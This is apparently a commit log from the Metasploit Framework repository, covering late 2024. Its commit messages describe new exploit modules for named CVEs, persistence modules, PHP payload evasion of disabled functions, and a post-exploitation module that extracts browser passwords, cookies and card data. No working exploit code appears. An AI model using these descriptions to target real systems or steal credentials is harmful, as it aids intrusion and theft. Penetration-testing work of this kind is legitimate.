Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2024-10-09 00:03:32 +02:00
Valentin Lobstein d01e8d4dd5 Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2024-10-09 00:03:23 +02:00
dledda-r7 2762132830 docs: adding motd_persistence docs 2024-10-08 11:22:13 -04:00
GhostlyBox 967f7c30a0 Update enum_unattend.rb
Included checks for '.vmimport' files which may have been created by the AWS EC2 VMIE service which will still contain cleartext credentials.
2024-10-07 17:58:30 +01:00
Graeme Robinson f3bb48f277 Update werkzeug_debug_rce documentation to include new logged messages 2024-10-07 11:56:16 +01:00
Graeme Robinson 3e422c235b Use random number to check for code execution in werkzeug_debug_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-10-07 10:59:29 +01:00
Graeme Robinson 255ab5c3ff Change some messages from vprint to print werkzeug_debug_rce.rb 2024-10-07 10:31:03 +01:00
Graeme Robinson 8ad38f1d1a Appease the linter when checking werkzeug_debug_rce.rb 2024-10-06 20:43:25 +01:00
Graeme Robinson 97c5afed52 Update werkzeug exploit module documentation 2024-10-06 20:19:48 +01:00
Graeme Robinson d135b572f5 Add support for Cookie/PIN generation to Werkzeug RCE 2024-10-06 20:18:12 +01:00
Alex 9eda0338af Improved readability and other small fixes 2024-10-06 10:19:10 +02:00
Chocapikk 3515015e1b Lint 2024-10-04 19:35:15 +02:00
NtAlexio2 29c0a10fd2 allow settings the RPORT option for pipe_dcerpc_auditor 2024-10-04 12:37:06 -04:00
Valentin Lobstein 686f31aac1 Update modules/exploits/multi/http/wp_givewp_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-10-04 17:32:18 +02:00
Valentin Lobstein 888c446f9a Update modules/exploits/multi/http/wp_givewp_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-10-04 17:32:10 +02:00
Valentin Lobstein 3a244212e2 Update modules/exploits/multi/http/wp_givewp_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-10-04 17:32:03 +02:00
Valentin Lobstein b8aad8b22f Update modules/exploits/multi/http/wp_givewp_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-10-04 17:31:54 +02:00
Chocapikk 98b857e1a7 Lint 2024-10-04 18:04:21 +02:00
Spencer McIntyre f2a723541d Add a test for the python/exec payload 2024-10-04 11:10:50 -04:00
Spencer McIntyre c051ea5a7f Add a python/exec payload to execute OS commands 2024-10-04 10:03:08 -04:00
Valentin Lobstein 0dba8f0963 Update modules/exploits/multi/http/wp_givewp_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-10-04 16:01:29 +02:00
Valentin Lobstein 48e740d1fc Update documentation/modules/exploit/multi/http/wp_givewp_rce.md
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2024-10-03 16:34:24 +02:00
Chocapikk 05c579fd65 Add report_host, report_service and report_vuln 2024-10-03 16:12:37 +02:00
Chocapikk 5733d43fb0 Update check function 2024-10-03 14:13:29 +02:00
Metasploit 5e2fab24ef Bump version of framework to 6.4.30 2024-10-03 03:42:02 -05:00
Metasploit f5a1ab1c60 automatic module_metadata_base.json update 2024-10-02 17:04:44 -05:00
jheysel-r7 8d6972081f Land #19480 update service_persistence for openrc
This updates exploits/linux/local/service_persistence.rb to work on systems that are running OpenRC
2024-10-02 17:48:18 -04:00
Metasploit 745f61e3f8 automatic module_metadata_base.json update 2024-10-02 15:19:27 -05:00
jheysel-r7 1cdaeac843 Land #19463 Add Acronis Cyber Default Password RCE
This adds an RCE module Acronis Cyber Infrastructure Default Password [CVE-2023-45249]
2024-10-02 16:02:50 -04:00
Metasploit cb060d9161 automatic module_metadata_base.json update 2024-10-02 14:05:07 -05:00
Chocapikk d14866a34d Update description 2024-10-02 21:02:26 +02:00
Chocapikk 1d083cf9e8 Add credit for the bypass 2024-10-02 20:57:57 +02:00
Brendan dc03b02857 Merge pull request #19510 from bcoles/cups_browsed_info_disclosure
Add cups-browsed Information Disclosure module
2024-10-02 13:48:40 -05:00
Chocapikk 58878db970 update doc 2024-10-02 19:56:22 +02:00
Chocapikk fbb74a6d2d Add bypass for GiveWP RCE (CVE-2024-8353) 2024-10-02 19:53:20 +02:00
Metasploit 8dc89cac14 automatic module_metadata_base.json update 2024-10-02 08:20:42 -05:00
adfoster-r7 e614e90a88 Merge pull request #19526 from rapid7/revert-19397-replace-readline-with-reline
Revert "Replace Readline with Reline"
2024-10-02 13:55:24 +01:00
Simon Janusz a31261ecf2 Revert "Replace Readline with Reline" 2024-10-02 13:15:12 +01:00
jvoisin 811678a793 Add openrc to exploits/linux/local/service_persistence.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-10-02 12:54:33 +02:00
jheysel-r7 c7d1e3411a Land #19471 Add fuzzy-use plugin
This adds a plugin that offers the fzuse command to offer a different UI for the selection of modules. It requires fzf to be present.
2024-10-01 14:28:11 -04:00
adfoster-r7 2ea71c410c Merge pull request #19523 from adfoster-r7/fix-windows-dns-crash-on-bootup
Fix windows DNS crash on bootup
2024-10-01 13:49:05 +01:00
adfoster-r7 49a7caf097 Fix windows DNS crash on bootup 2024-10-01 13:04:27 +01:00
Metasploit b2e4ec9e29 automatic module_metadata_base.json update 2024-09-30 16:37:15 -05:00
jheysel-r7 8761226b97 Land #19456 VICIdial Auth RCE module
This adds a module to exploit CVE-2024-8504 an authenticated RCE in VICIdial
2024-09-30 17:13:33 -04:00
Chocapikk f52cd8ba57 Add coding: binary header 2024-09-30 13:01:25 +02:00
Spencer McIntyre 669ea97d54 Revert a change that exposed the user store 2024-09-27 17:45:33 -04:00
bcoles 7cf5782b13 Add cups-browsed Information Disclosure module 2024-09-28 02:35:39 +10:00
adfoster-r7 953f6c1594 Merge pull request #19508 from cgranleese-r7/mssql-acceptance-remove-bundler-version
Removes bundler version from MSSQL acceptance testing
2024-09-27 16:02:11 +01:00
cgranleese-r7 f520d7ba05 Removes bundler version from MSSQL acceptance testing 2024-09-27 14:06:14 +01:00
adfoster-r7 48c358f2ee Land #19507, updates failing MSSQL docker health check 2024-09-27 14:01:24 +01:00
cgranleese-r7 c94b4028e3 Update failing mssql docker health check 2024-09-27 12:49:49 +01:00
Alex a4fd4df052 Merge branch 'rapid7:master' into enum_browsers 2024-09-27 08:06:17 +02:00
Alex 6d28e4b350 Update modules/post/windows/gather/enum_browsers.rb
Co-authored-by: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com>
2024-09-27 08:03:02 +02:00
Alex 4a9754313a Update modules/post/windows/gather/enum_browsers.rb
Co-authored-by: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com>
2024-09-27 08:02:57 +02:00
Alex 1e67d200d2 Update modules/post/windows/gather/enum_browsers.rb
Co-authored-by: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com>
2024-09-27 08:02:48 +02:00
Metasploit fa43885eca automatic module_metadata_base.json update 2024-09-26 20:00:39 -05:00
jheysel-r7 94c19395f3 Merge pull request #19466 from jvoisin/singles_php
Use php_preamble/php_system_block instead of `system` in payloads/singles/php/
2024-09-26 20:35:40 -04:00
Chocapikk c2a803aba3 Lint 2024-09-27 01:25:37 +02:00
Chocapikk 10a4b24ed7 Better file clean 2024-09-27 01:17:07 +02:00
adfoster-r7 55943e797b Land #19505, Fix broken OSX Java compilation tests 2024-09-26 23:32:46 +01:00
Metasploit ab7403147f Bump version of framework to 6.4.29 2024-09-26 17:26:27 -05:00
adfoster-r7 fa2d13b988 Move Java meterpreter compilation to linux 2024-09-26 23:07:38 +01:00
h00die-gr3y c43a4f4b0b Fixed cluster ID issue 2024-09-26 21:53:27 +00:00
Chocapikk 2304bde907 Add suggestions + clean database files during on_new_session 2024-09-26 23:48:51 +02:00
Jack Heysel 4f846eebe0 Fixed paload spec 2024-09-26 14:36:20 -07:00
Metasploit 44ad0e98d5 automatic module_metadata_base.json update 2024-09-26 16:27:04 -05:00
jheysel-r7 05ff8359b8 Merge pull request #19436 from h4x-x0r/CVE-2024-6670
WhatsUp Gold SQL Injection (CVE-2024-6670) Module
2024-09-26 17:04:30 -04:00
Metasploit b00b808966 automatic module_metadata_base.json update 2024-09-26 14:31:49 -05:00
Brendan dbc020a745 Merge pull request #19441 from Takahiro-Yoko/cve_2023_0386_priv_esc
Land #19441, Add module: Linux Priv Esc (OverlayFS copying bug) CVE-2023-0386
2024-09-26 14:07:17 -05:00
Alex 78f7327ea7 Update enum_browsers.rb 2024-09-26 20:49:42 +02:00
bwatters-r7 3e6572abde Update binary 2024-09-26 13:45:44 -05:00
Alex 6cc6841821 Update modules/post/windows/gather/enum_browsers.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-09-26 20:44:45 +02:00
Valentin Lobstein a9901d00a9 Update modules/exploits/unix/webapp/byob_unauth_rce.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-09-26 20:24:24 +02:00
Valentin Lobstein 499a1c30b5 Update modules/exploits/unix/webapp/byob_unauth_rce.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-09-26 20:24:14 +02:00
Valentin Lobstein 96f9bf61ac Update modules/exploits/unix/webapp/byob_unauth_rce.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-09-26 20:24:02 +02:00
Alex f106f1cf2c Add enum_browsers post exploitation module
This post-exploitation module extracts sensitive browser data from both Chromium-based and Gecko-based browsers on the target system. It supports the decryption of passwords and cookies using Windows Data Protection API (DPAPI) and can extract additional data such as browsing history, keyword search history, download history, autofill data, and credit card information.
2024-09-26 19:21:42 +02:00
cgranleese-r7 b7a71b36c8 Land #19502, Update docker Ruby version 2024-09-26 16:09:37 +01:00
Metasploit 97038a772c automatic module_metadata_base.json update 2024-09-26 08:38:08 -05:00
Spencer McIntyre b41caa22d9 Merge pull request #19475 from NtAlexio2/smb_modules_rport
Allow setting the RPORT option for pipe_auditor
2024-09-26 09:19:27 -04:00
h4x-x0r 6c3e9338f7 Updated documentation
Updated documentation
2024-09-26 05:50:52 +01:00
h4x-x0r abddaf5657 Limit terminal output
Use TICKETSTODUMP instead of n characters
2024-09-26 05:43:55 +01:00
h4x-x0r e80c66d80a linting 2024-09-26 05:08:41 +01:00
h4x-x0r ac711e32a0 minor updates
added report_vuln, report_service, limited console output
2024-09-26 05:04:38 +01:00
h4x-x0r c20b1d8a03 minor fixes
minor fixes
2024-09-26 04:01:36 +01:00
jheysel-r7 d9f1a061b3 Merge branch 'master' into singles_php 2024-09-25 20:41:08 -04:00
Jack Heysel e392894b47 Unit test fix attempt 2024-09-25 17:39:02 -07:00
jheysel-r7 97e50ccb23 Merge pull request #19467 from jvoisin/wordpress_portable
Make lib/msf/core/exploit/remote/http/wordpress/admin.rb a tad more portable
2024-09-25 20:25:10 -04:00
Metasploit 4b05de522d automatic module_metadata_base.json update 2024-09-25 19:02:36 -05:00
jheysel-r7 256fd9c242 Merge pull request #19451 from jvoisin/phpnop
Improve modules/nops/php/generic.rb
2024-09-25 19:45:37 -04:00
Alex Romero 09ffbde5fe Update modules/auxiliary/scanner/smb/pipe_auditor.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-09-26 01:57:32 +03:30
Alex Romero e517aaf716 Update modules/auxiliary/scanner/smb/pipe_auditor.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-09-26 01:57:19 +03:30
Alex Romero 23f062af53 Update modules/auxiliary/scanner/smb/pipe_auditor.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-09-26 01:56:52 +03:30
Metasploit 7b470509b8 automatic module_metadata_base.json update 2024-09-25 13:44:58 -05:00
Spencer McIntyre 34ed3836fc Update the docs 2024-09-25 14:22:31 -04:00
jheysel-r7 456c57b031 Merge pull request #19453 from Chocapikk/vicidial_sqli
Add VICIdial Time-based SQL Injection Module (CVE-2024-8503)
2024-09-25 14:19:42 -04:00
Chocapikk 1e95cba5f2 Randomize values 2024-09-25 18:55:26 +02:00
h4x-x0r d4cd4aa843 added check method
added check method
2024-09-25 17:41:49 +01:00
h4x-x0r 174ed4ec97 minor improvements
minor improvements
2024-09-25 17:29:04 +01:00
h4x-x0r 5f95b2bf0d Documentation
Documentation
2024-09-25 17:15:54 +01:00
adfoster-r7 566a7f1c36 Update docker Ruby version 2024-09-25 16:30:05 +01:00
Valentin Lobstein 22443b53d6 Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-09-25 16:39:09 +02:00
Valentin Lobstein 0409d4ec9c Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-09-25 16:38:36 +02:00
adfoster-r7 a794d2aa3c Land #19501, Mettle now copying gem correctly and running acceptance tests 2024-09-25 15:29:02 +01:00
cgranleese-r7 11b5a1c9c9 Mettle now copying gem correctly and running acceptance tests 2024-09-25 15:03:56 +01:00
h4x-x0r d391999c92 Initial draft
Initial draft
2024-09-25 14:06:40 +01:00
h4x-x0r ac56da3d21 CVE-2024-28987
CVE-2024-28987
2024-09-25 13:16:09 +01:00
cgranleese-r7 9b4c2fea2b Land #19493, Improve documentation for testing the post exploitation API against opened sessions 2024-09-25 10:16:58 +01:00
Chocapikk a5d9a06b9a Fix with datastore['RHOST'] 2024-09-25 04:43:27 +02:00
Chocapikk 2d6862ccd4 Add recommendations 2024-09-25 03:57:17 +02:00
Chocapikk a1b4106260 Fix wordpress_sqli_get_users_credentials and rename wordpress_sqli_initialize 2024-09-25 01:57:46 +02:00
Chocapikk fa0d54eaf2 Add Metasploit::Credential::Creation to use create_credential 2024-09-25 01:00:48 +02:00
Chocapikk 3da638e37e Using dynamic prefix in table 2024-09-25 00:58:09 +02:00
Chocapikk 14f1d6a786 Add Msf::Exploit::Remote::HTTP::Wordpress::SQLi 2024-09-25 00:33:19 +02:00
NtAlexio2 e365138387 update and display correct rport 2024-09-24 16:32:02 -04:00
adfoster-r7 6fcdd570d7 Improve documentation for testing post api and tests 2024-09-24 18:58:18 +01:00
Metasploit f91c95b0a0 automatic module_metadata_base.json update 2024-09-24 11:43:07 -05:00
jheysel-r7 d11c2be4ea Merge pull request #19375 from h4x-x0r/CVE-2024-20419
Cisco Smart Software Manager (SSM) On-Prem Account Takeover (CVE-2024-20419) Module
2024-09-24 12:19:54 -04:00
adfoster-r7 480a938aaf Land #19184, Update bundler version 2024-09-24 17:02:31 +01:00
Christophe De La Fuente b5107583f1 Fix crash in #extract_user_and_realm with specific san extension 2024-09-24 14:34:09 +02:00
Takah1ro e89e573160 Update exploit binary 2024-09-24 19:36:39 +09:00
Dmitriy Shafranskiy 8060e6b3f9 Merge pull request #19483 from rapid7/SR-139850-snyk-folders-exclusion
Excluding test folders from snyk scan (test data)
2024-09-24 12:36:33 +02:00
Metasploit 0ee44151f7 automatic module_metadata_base.json update 2024-09-24 04:29:35 -05:00
adfoster-r7 9ff47b0eb3 Update bundler version 2024-09-24 10:29:20 +01:00
Takah1ro 755830024c Update exploit binary and remove unnecessary 2024-09-24 08:37:20 +09:00
Takah1ro 75329cc7c7 Add ; 2024-09-24 08:24:24 +09:00
Takah1ro 6d541b625f Remove unnecessary shell_path 2024-09-24 08:18:30 +09:00
Takah1ro a10459e772 Formatting exploit 2024-09-24 08:14:21 +09:00
Takahiro Yokoyama 130f146819 Apply suggestions from code review
Change to call setgid and setuid in the exploit before executing the payload

Co-authored-by: Brendan <bwatters@rapid7.com>
2024-09-24 08:06:26 +09:00
Takahiro Yokoyama 33152bf0ac Update external/source/exploits/CVE-2023-0386/cve_2023_0386.c
Add setuid(0) and setgid(0)

Co-authored-by: Brendan <bwatters@rapid7.com>
2024-09-24 08:03:20 +09:00
Jack Heysel 8e2dbbbd56 Land #19416, Add Traccar RCE module
This module exploits two vulnerabilities in Traccar v5.1 - v5.12 to
obtain remote code execution: A path traversal vulnerability
CVE-2024-24809 and an unrestricted file upload vulnerability
CVE-2024-31214.
2024-09-23 15:25:02 -07:00
jheysel-r7 e0e7c67ff7 Remove jsessionid parsing now that keep_cookies is being used 2024-09-23 18:12:01 -04:00
Jack Heysel f254eeb65e Added error handling 2024-09-23 14:16:26 -07:00
Valentin Lobstein 5408d0b5ac Update documentation/modules/exploit/unix/webapp/byob_unauth_rce.md 2024-09-23 18:40:26 +02:00
Valentin Lobstein b18cb3ecac Update documentation/modules/exploit/unix/webapp/byob_unauth_rce.md 2024-09-23 18:40:19 +02:00
Spencer McIntyre 73bd3fb2cd Merge pull request #19474 from sfewer-r7/bugfix-dns-windows
Bugfix for DNS resolver on Windows throwing NoMethodError
2024-09-23 11:44:48 -04:00
Jack Heysel b475f0dccb Land #19448, Improve screensaver management
Add a number of improvements to modules/post/multi/manage/screensaver.rb
2024-09-23 08:31:38 -07:00
Stephen Fewer ad98d749ca Instead of only setting a single domain name via self.domain, set self.searchlist which already supports an array of items (thanks Spencer!).
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-09-23 15:50:24 +01:00
adfoster-r7 feb9ebd9e9 Land #19478, Post::Linux::Kernel.kernel_arch: Add support for RISC-V and LoongArch 2024-09-23 15:44:34 +01:00
bcoles a6ccce8446 Bump rex-arch to 0.1.16 2024-09-23 23:43:37 +10:00
h4x-x0r 322188a112 Refactoring
Refactored code to remove duplicate requests
2024-09-23 13:29:46 +01:00
cgranleese-r7 a27d491bf8 Land #19491, Fix a crash in lib/msf/core/payload/php.rb 2024-09-23 10:53:53 +01:00
jvoisin 1647d3a96b Fix a crash in lib/msf/core/payload/php.rb
As it seems that shuffle is a method
(https://ruby-doc.org/core-2.7.0/Array.html#method-i-shuffle)
and not a function.

As spotted by @Chocapikk in
https://github.com/rapid7/metasploit-framework/pull/19445#pullrequestreview-2320780104
2024-09-22 21:07:53 +02:00
bcoles 9de029e2fa Post::Linux::Kernel.kernel_arch: Add support for RISC-V and LoongArch 2024-09-21 23:00:52 +10:00
Chocapikk 9e6adea0dc Add BYOB Unauthenticated RCE module exploiting arbitrary file write and command injection (CVE-2024-45256, CVE-2024-45257) 2024-09-21 04:00:56 +02:00
cgranleese-r7 73a6f09d3e Land #19484, Temp removal of mssql acceptance tests 2024-09-20 16:18:25 +01:00
adfoster-r7 e5c1334541 Temp removal of mssql acceptance tests 2024-09-20 16:03:19 +01:00
adfoster-r7 43db34cf54 Land #19413, Add automated acceptance tests for cmd_exec API 2024-09-20 15:23:17 +01:00
cgranleese-r7 cbd763fad5 Drys out some code 2024-09-20 14:54:03 +01:00
adfoster-r7 ab7e02d23f Merge pull request #19397 from sjanusz-r7/replace-readline-with-reline
Replace Readline with Reline
2024-09-20 14:23:40 +01:00
Dmitriy Shafranskiy 5f1918cc38 Update .snyk 2024-09-20 13:53:34 +02:00
h00die-gr3y 589b0f8331 updated documentation 2024-09-20 10:29:17 +00:00
h00die-gr3y 8e62f22315 fifth release with the option to use your own SSH private key 2024-09-20 09:50:13 +00:00
Dmitriy Shafranskiy 1b7cdc46f1 Excluding test folders from snyk scan (test data)
```bash
snyk code test

pre:
  469 Code issues found
  35 [High]   298 [Medium]   136 [Low] 
post:
  160 Code issues found
  28 [High]   71 [Medium]   61 [Low] 
```
2024-09-20 09:35:56 +02:00
h00die-gr3y 8b197a60f9 fourth release addressing review comments of jheysel-r7 2024-09-19 20:54:55 +00:00
Chocapikk 0515a1d3bc Update comment 2024-09-19 22:36:07 +02:00
Chocapikk f715cc68df Randomize values + add function to delete campaign 2024-09-19 22:33:50 +02:00
cgranleese-r7 2305fc4e9c Land #19476, Bump version of framework to 6.4.28 2024-09-19 19:20:14 +01:00
Spencer McIntyre cd96bcd478 Merge pull request #19462 from jvoisin/auto_compile
Add an `Auto` option to live_compile
2024-09-19 12:03:43 -04:00
Spencer McIntyre 9b0af80d3b Unnest the method and check for UNIXSocket 2024-09-19 11:18:02 -04:00
adfoster-r7 80f050a5f5 Bump version of framework to 6.4.28 2024-09-19 15:52:50 +01:00
NtAlexio2 48765fbfa5 allow setting the RPORT option for pipe_auditor 2024-09-19 10:43:40 -04:00
NtAlexio2 b172ef8d69 bugfix rport in smb_enumusers 2024-09-19 10:42:10 -04:00
cgranleese-r7 5ef3dfd531 Rebase to pull in #19428 changes 2024-09-19 11:13:07 +01:00
cgranleese-r7 8ab3b6c178 Address PR feedback 2024-09-19 11:09:14 +01:00
cgranleese-r7 7acea08c78 Refactors test to reduce code duplication 2024-09-19 11:09:14 +01:00
cgranleese-r7 44efbc21a8 Add automated acceptance tests for cmd_exec 2024-09-19 11:09:14 +01:00
sfewer-r7 9be50f74a8 The first array item will either be nil, or an array of domain names, so we pick the first one to avoid a NoMethodError for a =~ operation on an array object, during a call to the method valid? 2024-09-19 10:40:01 +01:00
jvoisin 38972a7b31 Add an Auto option to live_compile
Co-authored-by: zeroSteiner
2024-09-19 01:48:00 +02:00
adfoster-r7 3b33b23aa9 Land #19428, Rename Acceptance::Meterpreter module to Acceptance::Session 2024-09-18 22:49:33 +01:00
Chocapikk ae8df6c34b Add working documentation + working exploit 2024-09-18 17:00:18 +02:00
Chocapikk f62f5b2c9c Add working documentation 2024-09-18 16:30:07 +02:00
Spencer McIntyre ba65ecc6cd Remove boilerplate docs 2024-09-18 10:19:04 -04:00
Spencer McIntyre 3227e2e035 Catch exceptions on client connections 2024-09-18 10:03:39 -04:00
jvoisin b7fff5926b Use php_preamble/php_system_block instead of system in payloads/singles/php/
The `php_preamble`/`php_system_block` combo has builtin low-hanging evasion for
PHP's `disabled_functions` configuration (eg. `system` might not be available
but `shell_exec` is), so use it instead of hardcoding `system`.

This commit also brings modules/payloads/singles/php/reverse_perl.rb's style
more in line with the other uses of `php_preamble`/`php_system_block`.

Oh, and it makes lib/msf/core/payload/php.rb work on older Ruby version as
well.

Co-authored-by: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com>
2024-09-18 12:40:55 +02:00
Chocapikk 005dc4941d Update (still working on it) 2024-09-17 23:50:16 +02:00
Spencer McIntyre caf79d80eb Add a basic theme to make it look more integrated 2024-09-17 16:09:26 -04:00
jvoisin 9f4fa3ba67 Make lib/msf/core/exploit/remote/http/wordpress/admin.rb a tad more portable
- Randomize the license header, based on examples from
  https://developer.wordpress.org/plugins/plugin-basics/header-requirements/,
  as plugins developers are likely copy-pasting them in their own plugins.
- Use the php_preamble/php_system_block combo instead of hardcoding
  system/base64, as `system` might not be available on some WordPress
  deployments, and the combo has some low-hanging evasions for this case.
2024-09-17 21:53:27 +02:00
h00die-gr3y 9971aed96f third release addressing majority of the review comments 2024-09-17 19:23:38 +00:00
Spencer McIntyre ae26319e8f Update fzuse to be self contained 2024-09-17 15:16:53 -04:00
H00die.Gr3y d7fa23f30f Apply suggestions from code review
Co-authored-by: bcoles <bcoles@gmail.com>
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-09-17 19:00:48 +02:00
Spencer McIntyre 409b1aed45 Land #19461, Modernize NetWkstaUserEnum
Modernize NetWkstaUserEnum in smb scanner
2024-09-17 10:14:02 -04:00
Spencer McIntyre 7abfb6c205 Return nil on error to avoid another exception 2024-09-17 09:59:42 -04:00
Metasploit 1a14916e68 automatic module_metadata_base.json update 2024-09-17 07:32:43 -05:00
dledda-r7 0bf524482c Land #19345, Post module Windows LPE CVE-2024-30088 2024-09-17 08:13:21 -04:00
Metasploit f8ada15dea automatic module_metadata_base.json update 2024-09-17 06:15:03 -05:00
dledda-r7 6e696e24e5 Land #19457, WP Plugin LiteSpeed Cache Account Take Over Module 2024-09-17 06:30:33 -04:00
NtAlexio2 d4378d6c82 change output format to old style 2024-09-16 18:28:01 -04:00
NtAlexio2 a93e008836 update ruby_smb version 2024-09-16 17:55:58 -04:00
jvoisin 862acbdbae Improve screensaver management
- Add modern ways to unlock Linux machines remotely
- Use proper `register_options`
- Clarify the actions: lock/unlock, start/stop
- Add more platforms
- Add a couple of checks before running the commands
2024-09-16 23:41:37 +02:00
Alex Romero 9fac88f709 Update lib/msf/core/exploit/remote/ms_wkst.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-09-17 00:32:34 +03:30
h00die-gr3y 86c8879270 Added documentation 2024-09-16 19:54:59 +00:00
Jack Heysel 84a8eb7273 Respond to comments 2024-09-16 09:46:57 -07:00
cgranleese-r7 f20dcb27dd Land #19443, Remove an old comment in lib/msf/core/payload/php.rb 2024-09-16 14:59:05 +01:00
cgranleese-r7 062a1e72d7 Land #19445, Minor improvements of lib/msf/core/payload/php.rb 2024-09-16 14:30:58 +01:00
cgranleese-r7 76b0bc5c47 Renames Acceptance::Meterpreter module to Acceptance::Session 2024-09-16 13:11:39 +01:00
cgranleese-r7 720723fa9c Land #19414, Add missing constants for the Kerberos login scanner 2024-09-16 11:11:52 +01:00
h00die-gr3y 455c5b2391 second release module 2024-09-15 20:01:27 +00:00
h00die-gr3y 1ba05ac88a first release module 2024-09-15 19:47:32 +00:00
Takah1ro 30704c494a Remove unnecessary strip_comments 2024-09-15 10:00:43 +09:00
NtAlexio2 92234641bc modernize enumuser_domain in smb scanner 2024-09-13 16:12:01 -04:00
Jack Heysel 96e506d9f5 Fix cookie regex 2024-09-13 09:36:18 -07:00
Jack Heysel e7da81c271 Fix AdminCookieError admin_cookie check 2024-09-13 09:35:43 -07:00
jheysel-r7 300d2f5aa9 Apply suggestions from code review
Co-authored-by: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com>
2024-09-13 11:58:08 -04:00
Metasploit 7db428cd8d automatic module_metadata_base.json update 2024-09-13 08:19:05 -05:00
dledda-r7 83a31c8a2a Land #19454, Persistence post module using motd 2024-09-13 09:02:22 -04:00
dledda-r7 eda39a7d68 Land #19452, Add docs on how to use ngrok with Metasploit 2024-09-13 03:34:55 -04:00
Chocapikk 04711c4416 Add suggestions 2024-09-12 22:58:44 +02:00
jvoisin 6d659e3aa8 Add modules/exploits/linux/local/motd_persistence.rb 2024-09-12 17:41:47 +02:00
Metasploit 76d55c9045 automatic module_metadata_base.json update 2024-09-12 10:36:17 -05:00
dledda-r7 41a354372c Land #19449, Fix an exception when the target is not Ubuntu 2024-09-12 11:10:41 -04:00
h4x-x0r 05f591d005 Cleanup and check method added
Cleanup and check method added
2024-09-12 15:43:20 +01:00
Jack Heysel 38a3e7696d Responded to comments 2024-09-12 07:36:16 -07:00
Spencer McIntyre 8a812c25a1 Update the docs to highlight DNS handling 2024-09-12 10:16:00 -04:00
jvoisin 6530720605 Minor improvements of lib/msf/core/payload/php.rb
- Golf a condition
- Use the `shuffle` method instead of the weird `.sort_by` construct
2024-09-12 15:50:14 +02:00
h4x-x0r 30e6af7791 cleanup
Code cleanup and better handling of different use cases.
2024-09-12 14:34:45 +01:00
Metasploit 1a1c21a0b1 Bump version of framework to 6.4.27 2024-09-12 03:35:27 -05:00
Jack Heysel c11ef15897 Removed unnecessary log lines 2024-09-11 23:49:18 -07:00
Jack Heysel 41cf622f38 Minor docs fix 2024-09-11 23:46:13 -07:00
Jack Heysel c80a03fece WP LiteSpeed exploit CVE-2024-44000 2024-09-11 23:31:26 -07:00
Chocapikk 17838e66cd Add VICIdial Authenticated RCE module (CVE-2024-8504) 2024-09-12 01:37:44 +02:00
Jack Heysel dd5dd54af1 beta commit module working 2024-09-11 15:23:46 -07:00
Chocapikk 644b15e421 Add header 2024-09-11 21:31:52 +02:00
Chocapikk 550a376210 Add suggestions + documentation 2024-09-11 21:17:44 +02:00
Metasploit 1b6ac0d39e automatic module_metadata_base.json update 2024-09-11 11:34:27 -05:00
Christophe De La Fuente da99503bd4 Land #19455, Minor fix for SPIP BigUp Unauthenticated RCE 2024-09-11 18:18:16 +02:00
dledda-r7 5e2bf5aaca fix(modules): spip_bigup_unauth_rce minor fix 2024-09-11 11:46:52 -04:00
Metasploit 3b7b704e45 automatic module_metadata_base.json update 2024-09-11 09:58:11 -05:00
dledda-r7 62e852176d Land #19444, SPIP BigUp Plugin Unauthenticated RCE 2024-09-11 10:29:12 -04:00
Metasploit ebba72a51b automatic module_metadata_base.json update 2024-09-11 09:19:17 -05:00
dwelch-r7 9de9b525d9 Land #19432, Refactoring SPIP Modules for Windows Compatibility and Incorporating SPIP Mixin 2024-09-11 14:57:48 +01:00
Chocapikk 4140808c68 Add VICIdial Time-based SQL Injection Module for Admin Credential Enumeration 2024-09-11 02:25:31 +02:00
Spencer McIntyre f16f1aae2b Finish the ngrok documentation 2024-09-10 16:57:37 -04:00
Spencer McIntyre 4f8d91c337 Add the initial ngrok docs 2024-09-10 16:06:03 -04:00
jvoisin 8f61e957a8 Improve modules/nops/php/generic.rb
```irb
irb(main):001> length = 10
=> 10
irb(main):002>  Array.new(length) { ["\t", " ", "\n", "\r"].sample }.join
=> "  \r\t\n\t\t\n\t\r"
irb(main):003>
```
2024-09-10 21:28:43 +02:00
Spencer McIntyre 5e71490b66 Fix a typo when the kernel is not Ubuntu 2024-09-09 14:19:20 -04:00
Spencer McIntyre 85f344a2d1 Land #19410, Add clang support
Add clang support for live_compile?/upload_and_compile?
2024-09-09 13:53:47 -04:00
Spencer McIntyre 87ccb97d79 Remove an extra end statement 2024-09-09 13:07:48 -04:00
Christophe De La Fuente 1b4362b6d5 Set default server_name in #send_request_tgt_pkinit 2024-09-09 18:03:15 +02:00
Takah1ro 6b64640f8b Update doc 2024-09-09 21:22:07 +09:00
